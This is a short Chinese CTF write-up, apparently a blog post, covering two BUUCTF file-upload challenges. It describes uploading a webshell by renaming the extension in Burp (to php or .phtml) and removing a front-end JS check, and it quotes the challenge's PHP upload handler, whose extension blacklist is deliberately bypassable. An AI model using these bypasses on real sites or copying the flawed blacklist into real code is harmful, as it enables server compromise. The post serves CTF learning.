BUUCTF 文件上传

[WUSTCTF2020]CV Maker

考点:文件上传

解题

1、注册,登录,上传图片马,用bp抓包后将filename后缀改为php,连上蚁剑。

[ACTF2020 新生赛]Upload(文件上传-前端js验证&黑名单绕过)

1、F12,删除onsubmit="return checkFile()",绕过前端验证
2、发现不能上传php,就是可能后端黑名单过滤了php
上传一句话木马,用burpsuite抓包,修改filename的后缀为.phtml,连上蚁剑。
最后,放上源码:

<?php
	error_reporting(0);
	//设置上传目录
	define("UPLOAD_PATH", "./uplo4d");
	$msg = "Upload Success!";
	if (isset($_POST['submit'])) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_name = $_FILES['upload_file']['name'];
        $ext = pathinfo($file_name,PATHINFO_EXTENSION);
        if(in_array($ext, ['php', 'php3', 'php4', 'php5'])) {
	        exit('nonono~ Bad file!');
    	}

        $new_file_name = md5($file_name).".".$ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;


        if (move_uploaded_file($temp_file, $img_path)){
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
        }
        echo '<div style="color:#F00">'.$msg." Look here~ ".$img_path."</div>";
    }


?>
posted @ 2020-12-08 17:56  Pur3  阅读(656)  评论(0编辑  收藏  举报